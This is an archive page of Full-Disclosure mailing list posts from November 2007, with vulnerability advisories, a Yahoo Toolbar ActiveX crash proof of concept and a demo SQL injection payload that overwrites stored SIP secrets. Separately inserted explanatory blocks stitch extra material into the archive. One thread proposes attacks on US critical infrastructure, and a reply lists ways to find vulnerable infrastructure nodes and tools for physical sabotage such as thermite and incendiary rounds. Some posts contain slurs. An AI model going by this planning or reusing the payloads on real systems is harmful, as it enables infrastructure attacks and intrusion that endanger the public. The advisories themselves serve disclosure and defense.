Re: [Full-disclosure] High Value Target Selection

2007-11-30 Thread Peter Besenbruch
On Friday 30 November 2007 09:02:26 gmaggro wrote:
 I think it'd be interesting if we started a discussion on the selection
 of high value targets to be used in the staging of attacks that damage
 significant infrastructure. The end goals, ranked equal in importance,
 would be as follows:

[big snip]

So, you wanted to send a little Christmas present to the NSA folks monitoring 
the Internet backbone? Make their unutterably boring lives a little 
more interesting?

We live in interesting times (not a good thing). I was over at the Mycroft 
site, and noticed that there was a Firefox search extension for Scroogle that 
uses encryption. There was another encrypted search tool for Wikipedia.

http://mycroft.mozdev.org/download.html?name=scroogle&sherlock=yes&opensearch=yes&submitform=Search
http://mycroft.mozdev.org/download.html?name=secure+wikipedia&sherlock=yes&opensearch=yes&submitform=Search

-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] 27Mhz based wireless security insecurities - Aka - We know what you typed last summer

2007-11-30 Thread Max Moser
Dear List members,

Today the remote-exploit.org team, together with Dreamlab Technologies, would
like to release another piece of unique research work.

Although the trend in wireless communication in peripheral devices such as
keyboards and mice is moving towards Bluetooth, market leaders such as
Logitech and Microsoft rely on cost-efficient, tried-and-tested 27Mhz radio
technology.

Using just a simple radio receiver, a soundcard and suitable software, the
remote-exploit.org members Max Moser & Philipp Schroedel have managed to
tap and decode the radio frequencies transmitted between the keyboard and
PC/notebook computer.

Although manufacturers of wireless keyboards partially prevent data from being
tapped by using cryptography, unfortunately the encryption is weak and thus does
not offer real protection.

During the test, we succeeded in eavesdropping traffic from a distance
of up to ten meters. With the appropriate technical equipment, larger distances
are possible.

For further information/whitepaper and a demonstration of the attack, check out:

http://www.remote-exploit.org  or http://www.dreamlab.net.

In addition you can find the official non-technical press release from
Dreamlab Technologies at:

http://www.remote-exploit.org/Press_Release_Dreamlab_Technologies_Wireless_Keyboard.pdf

Max Moser & Philipp Schroedel
Dreamlab Technologies AG / Team remote-exploit.org

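
What "weak encryption" on a keystroke link means in practice, as an added example that is not part of the remote-exploit.org / Dreamlab release and does not reproduce any vendor's real frame format: it assumes a toy scheme (one fixed key byte XORed onto each USB HID usage ID, one keystroke per frame) and a constructed capture, and shows that a key space a sniffer can exhaust falls to nothing more than a plausibility check on the decoded bytes.

```python
# Added illustration; the frame format and key schedule are assumptions made
# for this example, not the scheme used by any real 27 MHz keyboard.

# USB HID keyboard usage IDs: 'a'..'z' are 0x04..0x1D, space is 0x2C.
HID_TO_CHAR = {0x04 + i: chr(ord("a") + i) for i in range(26)}
HID_TO_CHAR[0x2C] = " "
CHAR_TO_HID = {c: k for k, c in HID_TO_CHAR.items()}

# Rough English letter ranking, used only as a tie-breaker (most common first).
LETTER_RANK = {c: 12 - i for i, c in enumerate("etaoinshrdlu")}


def keyboard_encrypt(text, key):
    """Assumed toy scheme: each keystroke frame is the HID usage ID XORed with
    a single key byte that never changes for the life of the pairing."""
    return bytes(CHAR_TO_HID[c] ^ key for c in text)


def decrypt_frames(frames, key):
    return [b ^ key for b in frames]


def plausibility(keycodes):
    """How much a candidate decryption looks like typed text: primarily the
    number of frames that land on a valid usage ID (a wrong key byte pushes
    most of them outside the 27 valid values), then letter frequency."""
    valid = sum(1 for k in keycodes if k in HID_TO_CHAR)
    rank = sum(LETTER_RANK.get(HID_TO_CHAR.get(k), 0) for k in keycodes)
    return (valid, rank)


def recover_key(frames):
    """Exhaust all 256 possible key bytes; the tiny key space is the whole problem."""
    return max(range(256), key=lambda k: plausibility(decrypt_frames(frames, k)))


def recover_text(frames):
    """Return (recovered key byte, decoded text) for a sniffed frame sequence."""
    key = recover_key(frames)
    return key, "".join(HID_TO_CHAR.get(k, "?") for k in decrypt_frames(frames, key))


if __name__ == "__main__":
    # Constructed capture: the frames a sniffer would see for this text under
    # the toy scheme with key byte 0xA7 (arbitrary choice).
    captured = keyboard_encrypt("attack at dawn", 0xA7)
    print(recover_text(captured))  # -> (167, 'attack at dawn')
```

Under this toy scheme the space key is what pins the key byte down: a capture containing only letters can leave several key bytes that all decode into the a..z range (XOR with 0x01, for instance, only swaps adjacent usage IDs), which is why the frequency ranking is kept as a tie-breaker. The whitepaper linked above covers the vendors' actual scheme; the point the example makes is the one the announcement makes, that a key an attacker can exhaust offers no real protection.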


[Full-disclosure] High Value Target Selection

2007-11-30 Thread gmaggro
I think it'd be interesting if we started a discussion on the selection
of high value targets to be used in the staging of attacks that damage
significant infrastructure. The end goals, ranked equal in importance,
would be as follows:

1. To bring like minded people together while operating under the
strategy of 'leaderless resistance'
(http://en.wikipedia.org/wiki/Leaderless_resistance)

2. To be the 'aboveground' partner to the 'underground' scene, or at
least serve to distract authorities from the activities of underground
groups

3. To see exactly what can be accomplished, and accomplish it

4. To capture the imagination of the public

The 'leaderless resistance' aspect of organization is going to be key.
Plenty of technology exists for encryption and anonymity but that
doesn't apply to people. We have to be like the Internet itself here, as
originally intended: able to take the largest of blows and route around
the damage automatically. We also have to be like good encryption: able
to expose everything about our mechanism without leading to compromise.

Capturing the imagination of the public sounds like bizspeek bullshit,
but it's a very powerful tool - it only takes one cow to start a
stampede. Furthermore it serves as a useful discriminator in selecting
targets. Bringing down Facebook or Amazon might annoy people... but it
really gets driven home when they can't pay their bills, buy food from
supermarkets, or take the train to work.

So, types of infrastructure to attack:

1. Transportation
2. Financial
3. Telecommunications
4. Petrochemical
5. Manufacturing
6. Health care
7. Education
8. Civilian Law Enforcement
9. Government (Judicial, Executive, Legislative)
10. Military

This is just what I've thought of to date. One thing we'll need to do is
prioritize that list and flesh it out. For instance, for 'Financial' I'd
be inclined to break up something like this: banks, credit card
companies, credit processing companies, ATM companies, credit bureaus,
collection agencies, investment firms, etc.

I guess we should pick some kind of a nation-state to narrow the scope.
I'm going to propose the USA for several reasons:

1. A lot of folks got it in for them. This makes it easier to blend into
the background. There's also the potential for assistance via
enemy-of-my-enemy-is-my-friend co-operation among like minded
individuals and groups. Also, in security, the advantage always goes to
the attacker; he only needs to be successful once but the defender has
to succeed every time. And since they're no doubt getting assaulted left
right and centre they've probably been tenderized pretty good. These
factors, I believe, combine to nullify any advantage they might have
from being well practiced at having to withstand assaults.

2. They're weak right now. In many ways. Given the issues in the
sub-prime market and its cascade effects, profits are down everywhere.
When businesses lose money, what's the first thing that suffers?
Customer service. What's the second thing? Security. Not trying to slant
politically one way or the other here, but the American implementation
of capitalism is not renowned for having led to people making quality
goods or loving their jobs. Sloppiness abounds whether it's ACLs on the
router or easy-to-social-engineer employees. The effects of more people
losing their jobs and increased sociocultural turmoil will only
exacerbate this. A lot of talented people will be out a job for reason of
economics or colour, and if engaged properly, can add to the ranks.

3. They're easy to penetrate. If you can't walk right into the states
over the Mexican or Canadian border, then there's a million lines of
fibre and copper running straight in. It is an incredibly well connected
place with a widely geographically dispersed populace. And a lot of
coffee shops near open wifi. Entire cities blanketed in connectivity
accessible from back alleys, washrooms in malls, or remote corners of
public parks with a 12db Yagi. Miles upon miles of SCADA wiring.



Re: [Full-disclosure] High Value Target Selection

2007-11-30 Thread coderman
On Nov 30, 2007 11:02 AM, gmaggro [EMAIL PROTECTED] wrote:
 I think it'd be interesting if we started a discussion on the selection
 of high value targets

translation: let's discuss how to discern high degree and/or vulnerable
nodes in critical infrastructure networks.


 1. To bring like minded people together while operating under the
 strategy of 'leaderless resistance'
 (http://en.wikipedia.org/wiki/Leaderless_resistance)

*yawn*


 2. To be the 'aboveground' partner to the 'underground' scene, or at
 least serve to distract authorities from the activities of underground
 groups

... ZZZZZ ... you're losing me, jim.


 3. To see exactly what can be accomplished, and accomplish it

pretty easy to make inferences once you've mapped out the critical
infrastructure in question.  this is of course a little more difficult now
given the mostly inept attempts to rein in useful information on such
infrastructure.  (the easy days of pulling up fiber plats via county/gov
websites is long gone...)

as for actual attacks, you'll be biting the hand that feeds...
(i'll wait for that decentralized wireless mesh net before slicing
those glassy life lines, thanks)


 4. To capture the imagination of the public

more like hatred.

the unwashed masses get all restless and cranky when:
a) the 'tubes are clogged or dead
b) phone lines to anywhere outside town are down.
c) all credit / debit transactions are dead - cash only?
d) some/most cable programming is tits up
e) travel and/or fuel is highly constrained / unavailable
f) electricity is spotty or unavailable


 Capturing the imagination of the public sounds like bizspeek bullshit,

this i fully agree with.  thanks for that...


 So, types of infrastructure to attack:
 [ list of infrastructure domains as if they exist as discrete units
 independent of each other... lolz! ]

rarely is one affected in isolation.  the ugly truth about critical infrastructure
is that those high degree, critical nodes start impacting multiple domains
at once when affected by outages or targeted attack.


 [lots of blah blah blah misunderstanding of what critical infrastructure
  is and how it is organized, USA bashing, etc...]

first, go read Global Guerrillas.  that will keep you busy for a few weeks
and save us all more of this blather:
 http://globalguerrillas.typepad.com/globalguerrillas/

second, some attacking critical infrastructure clif notes:

1. those with clue have realized the folly of trying to make infallible
   infrastructure.  their focus has shifted to rapid repair instead of
   prevention.  there are papers written that describe exactly how
   stupid it is to think you can build resilient infrastructure in the face
   of a skilled attacker.
   (see the ATT telco in a trailer truck, etc)

2. critical infrastructure viewed as a graph theory problem highlights
   the compound vulnerabilities across multiple infrastructures inherent
   in high degree / high value nodes of critical infrastructure.
   (metropolitan bridges carrying fiber, gas, electricity, vehicles, etc
over the same physical span, etc.)

3. most critical infrastructure is resilient against planned / common
   failure scenarios, and these protections actually create hyper-
   sensitive vulnerabilities against targeted / unplanned attacks.
   (M of N redundancy that leads to catastrophic failure against
well targeted M attacks, etc.)

combining these aspects into attack scenarios is left as an
exercise for the reader [who pines for a vacation in club fed...]

the crux of the problem for the practical attacker is discerning the nature
and location of critical infrastructure nodes and links.  fortunately for the
determined individual this is merely a matter of effort and time, not a
question of ability.  for the rest of us this means our life style / way of life
is highly dependent on the lack of sufficiently skilled malcontents able and
willing to express their grievances in direct action against such systems.

perhaps this can be viewed as a check against the fascist dystopia many
fear as the end result of authoritarian abuse of power coupled with high
tech tools for manipulation and control of the populace...

best regards,


p.s. my favorite tools in such scenarios (of course not advocating):

- the thermic lance
- portable saws (lithium battery cells quite power dense now)
- post hole diggers
- thermite flower pots (lol, so much fun!)
- software defined / police band and EM svcs capable radios
- bolt action .50 BMG (incendiary DU rounds++)



Re: [Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS

2007-11-30 Thread Joey Mengele
Yeah, strange how EIP isn't overwritten with your hacker savvy 0x41 
characters. Except for the fact that this again is a stack overflow 
exception and not a stack based buffer overflow. I implore you, 
LEAVE THE TROLLING TO THE PROFESSIONALS. Thanks.

J

On Wed, 31 Dec 1969 19:00:00 -0500 Elazar Broad 
[EMAIL PROTECTED] wrote:
There is a stack overflow in the c() method of the Yahoo Toobar 
Helper class. This overflow does not appear to get anywhere near 
the EIP or SEH. PoC as follows:

--
<!--
 written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
function Check() {
  // Seed string assumed to be "A" (0x41), as the reply above notes; the
  // literal itself did not survive extraction.
  var s = "A";

  // Double the string until it is at least 99 characters long.
  while (s.length < 99) s = s + s;

  // Instantiate the Yahoo Toolbar Helper control by ProgID; its CLSID is
  // {02478D38-C3F9-4EFB-9B51-7695ECA05670}.
  var obj = new ActiveXObject("yt.ythelper.2");
  obj.c(s);
}
  </script>

 </head>
 <body onload="JavaScript: return Check();">
 </body>
</html>
--

Elazar




Re: [Full-disclosure] n3td3v denounces the actions of www.derangedsecurity.com

2007-11-30 Thread Joey Mengele
Byron,

I don't understand what you mean in this message. Can you elaborate?

J

On Thu, 29 Nov 2007 10:05:19 -0500 Byron Sonne [EMAIL PROTECTED] 
wrote:
 fellow scots stick up for each other, so remember that the next 
time
 you talk to a scotsman, because we're tough and bold and we'll 
kick
 you in the teeth you swedish fuck.

You know why Scots wear kilts, right?

Sheep can hear zippers.



[Full-disclosure] AST-2007-026 - SQL Injection issue in cdr_pgsql

2007-11-30 Thread Asterisk Security Team
   Asterisk Project Security Advisory - AST-2007-026

   ++
   |   Product| Asterisk|
   |--+-|
   |   Summary| SQL Injection issue in cdr_pgsql|
   |--+-|
   |  Nature of Advisory  | SQL Injection   |
   |--+-|
   |Susceptibility| Remote Authenticated Sessions   |
   |--+-|
   |   Severity   | Moderate|
   |--+-|
   |Exploits Known| No  |
   |--+-|
   | Reported On  | November 29, 2007   |
   |--+-|
   | Reported By  | Tilghman Lesher tlesher AT digium DOT com |
   |--+-|
   |  Posted On   | November 29, 2007   |
   |--+-|
   |   Last Updated On| November 29, 2007   |
   |--+-|
   |   Advisory Contact   | Tilghman Lesher tlesher AT digium DOT com |
   |--+-|
   |   CVE Name   | |
   ++

   ++
   | Description | Input buffers were not properly escaped when providing   |
   | | the ANI and DNIS strings to the Call Detail Record   |
   | | Postgres logging engine. An attacker could potentially   |
   | | compromise the administrative database containing users' |
   | | usernames and passwords used for SIP authentication, |
   | | among other things.  |
   | |  |
   | | This module is not active by default and must be |
   | | configured for use by the administrator. Default |
   | | installations of Asterisk are not affected.  |
   ++

   ++
   | Workaround | Convert your installation to use cdr_odbc with the|
   || PgsqlODBC driver. This module provides similar|
   || functionality but is not vulnerable.  |
   ++

   ++
   |Resolution| Upgrade to Asterisk release 1.4.15 or higher.   |
   ++

   ++
   |   Affected Versions|
   ||
   | Product  |   Release|  |
   |  |Series|  |
   |--+--+--|
   |   Asterisk Open Source   |1.0.x | All versions |
   |--+--+--|
   |   Asterisk Open Source   |1.2.x | 1.2.24 and previous  |
   |--+--+--|
   |   Asterisk Open Source   |1.4.x | 1.4.14 and previous  |
   |--+--+--|
   |Asterisk Business Edition |A.x.x | All versions |
   |--+--+--|
   |Asterisk Business Edition |B.x.x | B.2.3.3 and previous |
   |--+--+--|
   |   AsteriskNOW| pre-release  | None |
   |--+--+--|
   | Asterisk 

[Full-disclosure] Yahoo Toolbar Helper c() Method Stack Overflow DoS

2007-11-30 Thread Elazar Broad
There is a stack overflow in the c() method of the Yahoo Toobar Helper class. 
This overflow does not appear to get anywhere near the EIP or SEH. PoC as 
follows:

--
<!--
 written by e.b.
-->
<html>
 <head>
  <script language="JavaScript" DEFER>
function Check() {
  // Seed string assumed to be "A" (0x41), as the follow-up reply notes; the
  // literal itself did not survive extraction.
  var s = "A";

  // Double the string until it is at least 99 characters long.
  while (s.length < 99) s = s + s;

  // Instantiate the Yahoo Toolbar Helper control by ProgID; its CLSID is
  // {02478D38-C3F9-4EFB-9B51-7695ECA05670}.
  var obj = new ActiveXObject("yt.ythelper.2");
  obj.c(s);
}
  </script>

 </head>
 <body onload="JavaScript: return Check();">
 </body>
</html>
--

Elazar



[Full-disclosure] PlayStation 3 predicts next US president (fwd)

2007-11-30 Thread Jay Sulzberger


-- Forwarded message --
  Date: Fri, 30 Nov 2007 05:29:35 +0100
  From: Weger, B.M.M. de [EMAIL PROTECTED]
  Cc: [EMAIL PROTECTED], [EMAIL PROTECTED]
  Subject: PlayStation 3 predicts next US president

  Hi all,

  We (Marc Stevens, Arjen Lenstra and me) have used a Sony PlayStation 3
  to correctly predict the outcome of the 2008 US presidential elections.
  See http://www.win.tue.nl/hashclash/Nostradamus if you want to know
  the details of what this has to do with cryptography.

  We also announce two different Win32 executables that have identical
  MD5 hash values. This can be made to happen for any two executable
  files.
  This implies a vulnerability in software integrity protection and
  code signing schemes that still use MD5.
  See http://www.win.tue.nl/hashclash/SoftIntCodeSign for details.

  Grtz,
  Benne de Weger

  -
  The Cryptography Mailing List
  Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]




[Full-disclosure] AST-2007-025 - SQL Injection issue in res_config_pgsql

2007-11-30 Thread Asterisk Security Team
   Asterisk Project Security Advisory - AST-2007-025

   ++
   |   Product| Asterisk|
   |--+-|
   |   Summary| SQL Injection issue in res_config_pgsql |
   |--+-|
   |  Nature of Advisory  | SQL Injection   |
   |--+-|
   |Susceptibility| Remote Unauthenticated Sessions |
   |--+-|
   |   Severity   | Moderate|
   |--+-|
   |Exploits Known| No  |
   |--+-|
   | Reported On  | November 29, 2007   |
   |--+-|
   | Reported By  | P. Chisteas p_christ AT hol DOT gr|
   |--+-|
   |  Posted On   | November 29, 2007   |
   |--+-|
   |   Last Updated On| November 29, 2007   |
   |--+-|
   |   Advisory Contact   | Tilghman Lesher tlesher AT digium DOT com |
   |--+-|
   |   CVE Name   | |
   ++

   ++
   | Description | Input buffers were not properly escaped when providing   |
   | | lookup data to the Postgres Realtime Engine. An attacker |
   | | could potentially compromise the administrative database |
   | | containing users' usernames and passwords used for SIP   |
   | | authentication, among other things.  |
   | |  |
   | | This module is not active by default and must be |
   | | configured for use by the administrator. Default |
   | | installations of Asterisk are not affected.  |
   ++

   ++
   | Workaround | Convert your installation to use res_config_odbc with the |
   || PgsqlODBC driver. This module provides similar|
   || functionality but is not vulnerable.  |
   ++

   ++
   |Resolution| Upgrade to Asterisk release 1.4.15 or higher.   |
   ++

   ++
   |   Affected Versions|
   ||
   |   Product|   Release   |   |
   |  |   Series|   |
   |--+-+---|
   | Asterisk Open Source |1.0.x| None  |
   |--+-+---|
   | Asterisk Open Source |1.2.x| None  |
   |--+-+---|
   | Asterisk Open Source |1.4.x| 1.4.14 and previous   |
   |  | | versions  |
   |--+-+---|
   |  Asterisk Business Edition   |A.x.x| None  |
   |--+-+---|
   |  Asterisk Business Edition   |B.x.x| None  |
   |--+-+---|
   | AsteriskNOW  | pre-release | None  |
   |--+-+---|
   | Asterisk 
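
The bug class behind AST-2007-025 and AST-2007-026, as an added example that is not Asterisk's code: caller-supplied strings (the ANI/DNIS that cdr_pgsql logs, or the lookup data res_config_pgsql passes to the realtime engine) interpolated into SQL without escaping, next to the bound-parameter form. The schema, the table and column names, and the hostile ANI are all constructed for this example; sqlite3's executescript() stands in for libpq's PQexec(), which likewise executes every statement in the string it is handed.

```python
import sqlite3

# Constructed stand-in for the administrative database the advisories describe:
# a CDR table written by the CDR backend and a table of SIP peers with their
# secrets. Table and column names are assumptions, not Asterisk's schema.
SCHEMA = """
CREATE TABLE cdr (calldate TEXT, src TEXT, dst TEXT, disposition TEXT);
CREATE TABLE sip_peers (name TEXT, secret TEXT);
INSERT INTO sip_peers VALUES ('1001', 'correct-horse');
"""

# Constructed hostile caller ID. The first three values complete the INSERT's
# VALUES list, a stacked UPDATE then rewrites a SIP secret, and '--' comments
# out the remainder of the original statement.
HOSTILE_ANI = "555', '', ''); UPDATE sip_peers SET secret='pwned'; --"


def build_cdr_insert_unescaped(ani, dnis):
    """Vulnerable pattern: ANI/DNIS pasted straight into the SQL text."""
    return ("INSERT INTO cdr (calldate, src, dst, disposition) "
            "VALUES ('2007-11-29 12:00:00', '%s', '%s', 'ANSWERED')" % (ani, dnis))


def log_cdr_vulnerable(conn, ani, dnis):
    # executescript() runs every statement in the string, as PQexec() does, so
    # whatever the caller stacked into ANI runs with the CDR account's rights.
    conn.executescript(build_cdr_insert_unescaped(ani, dnis))


def log_cdr_fixed(conn, ani, dnis):
    """Bound parameters: the driver carries ANI/DNIS as data, never as SQL."""
    conn.execute(
        "INSERT INTO cdr (calldate, src, dst, disposition) VALUES (?, ?, ?, 'ANSWERED')",
        ("2007-11-29 12:00:00", ani, dnis),
    )


def simulate_call(log_cdr):
    """Log one call with HOSTILE_ANI through the given CDR writer and return
    (the SIP secret afterwards, the src column as actually stored)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    log_cdr(conn, HOSTILE_ANI, "1001")
    secret = conn.execute("SELECT secret FROM sip_peers WHERE name = '1001'").fetchone()[0]
    src = conn.execute("SELECT src FROM cdr").fetchone()[0]
    conn.close()
    return secret, src


if __name__ == "__main__":
    print("vulnerable:", simulate_call(log_cdr_vulnerable))  # -> ('pwned', '555')
    print("fixed:", simulate_call(log_cdr_fixed))            # -> ('correct-horse', HOSTILE_ANI)
```

Two things worth noticing: the vulnerable path leaves a perfectly normal-looking CDR row (src '555'), so the log itself does not betray the injection, and the "Remote Unauthenticated" susceptibility of AST-2007-025 follows from the fact that caller ID and dialled-number strings arrive from the network before any SIP authentication has happened. When bound parameters are not available and strings must be escaped on the way in, use the driver's connection-aware routine (libpq's PQescapeStringConn()); doubling single quotes by hand is not enough on a server that also treats backslashes as escapes.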

[Full-disclosure] Matasano watchdog blog opening shortly ..

2007-11-30 Thread Gobbles is back
Hello .. lol

Following our last post about Matasano's retarded commentary on the security
scene .. We'd like all our fans to know that our blog is about to go live. For
those who missed our earlier email .. This blog covers the following


1) Every time Matasano/Dave decide to talk from his/their ass, we shoot him
down

2) Every time a senseless topic unrelated to security such as turbo bits
is discussed we shoot him down

3) Whenever they discuss on virtualized rootkit and herbal pills by Joana
Rustokava we REALLY SHOOT THEM DOWN

4) Any name throwing we slap them a bit

Tip for Matasano - Keep your blog clean, don't act Jesus, don't abuse
securityfocus nexus power to dictate scene.. and always remember .. He make
you look like Jobe from ADM if u act funny ..

Having said that, lets start the fireworks .. we are still waiting for one
of these jokers to post some new stuff .. once they do .. he post official
blog link on FD.

Love,

Gobble

PS –  [EMAIL PROTECTED], spam the idiot !!

[Full-disclosure] rPSA-2007-0254-1 idle python

2007-11-30 Thread rPath Update Announcements
rPath Security Advisory: 2007-0254-1
Published: 2007-11-30
Products:
rPath Appliance Platform Linux Service 1
rPath Linux 1

Rating: Major
Exposure Level Classification:
Indirect Deterministic Denial of Service
Updated Versions:
[EMAIL PROTECTED]:1/2.4.1-20.14-1
[EMAIL PROTECTED]:1/2.4.1-20.14-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1885

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4965

Description:
Previous versions of the python package contain multiple integer
overflow vulnerabilities that can cause some python applications to
crash (Denials of Service) or reveal memory contents (Information
Exposures).

http://wiki.rpath.com/Advisories:rPSA-2007-0254

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
